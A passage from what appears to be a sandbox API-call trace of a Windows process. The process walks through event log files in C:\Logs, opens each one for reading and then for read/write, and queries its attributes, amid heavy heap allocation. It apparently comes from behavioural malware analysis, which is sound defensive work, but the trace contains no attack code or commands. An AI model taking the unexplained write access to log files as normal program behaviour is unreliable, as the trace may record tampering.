lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 51 [0086.193] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.193] GetFileType (hFile=0x424) returned 0x1 [0086.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0086.193] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.193] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.193] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.194] CloseHandle (hObject=0x424) returned 1 [0086.194] AreFileApisANSI () returned 1 [0086.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x463c8 [0086.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x463c8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 51 [0086.194] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.194] GetFileType (hFile=0x424) returned 0x1 [0086.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x463c8 | out: hHeap=0x20000) returned 1 [0086.194] CloseHandle (hObject=0x424) returned 1 [0086.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0086.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0086.194] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0086.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.194] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0086.195] AreFileApisANSI () returned 1 [0086.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46898 [0086.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46898, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx") returned 51 [0086.195] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0086.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.195] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.195] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx", cAlternateFileName="MIF8AA~1.EVT")) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0086.195] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.195] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0086.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0086.196] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.196] AreFileApisANSI () returned 1 [0086.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx", lpUsedDefaultChar=0x0) returned 57 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0086.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.196] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0086.196] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.197] AreFileApisANSI () returned 1 [0086.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.197] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0086.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 57 [0086.197] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.198] GetFileType (hFile=0x424) returned 0x1 [0086.198] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.199] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.199] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.199] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.199] CloseHandle (hObject=0x424) returned 1 [0086.199] AreFileApisANSI () returned 1 [0086.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.199] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0086.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 57 [0086.199] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0086.199] GetFileType (hFile=0x424) returned 0x1 [0086.199] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0086.200] CloseHandle (hObject=0x424) returned 1 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.200] AreFileApisANSI () returned 1 [0086.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0086.200] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a630 [0086.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=57 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx") returned 57 [0086.200] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000)) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.200] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0086.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.201] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.201] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx", cAlternateFileName="MI34FE~1.EVT")) returned 1 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0086.201] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.201] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0086.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0086.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0086.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.376] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0086.376] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0086.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.376] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0086.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.382] AreFileApisANSI () returned 1 [0086.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx", lpUsedDefaultChar=0x0) returned 59 [0086.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0086.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0086.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0086.391] AreFileApisANSI () returned 1 [0086.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0086.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0086.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx") returned 59 [0086.392] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.392] GetFileType (hFile=0x348) returned 0x1 [0086.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.392] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.392] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.392] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.392] CloseHandle (hObject=0x348) returned 1 [0086.393] AreFileApisANSI () returned 1 [0086.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0086.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0086.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 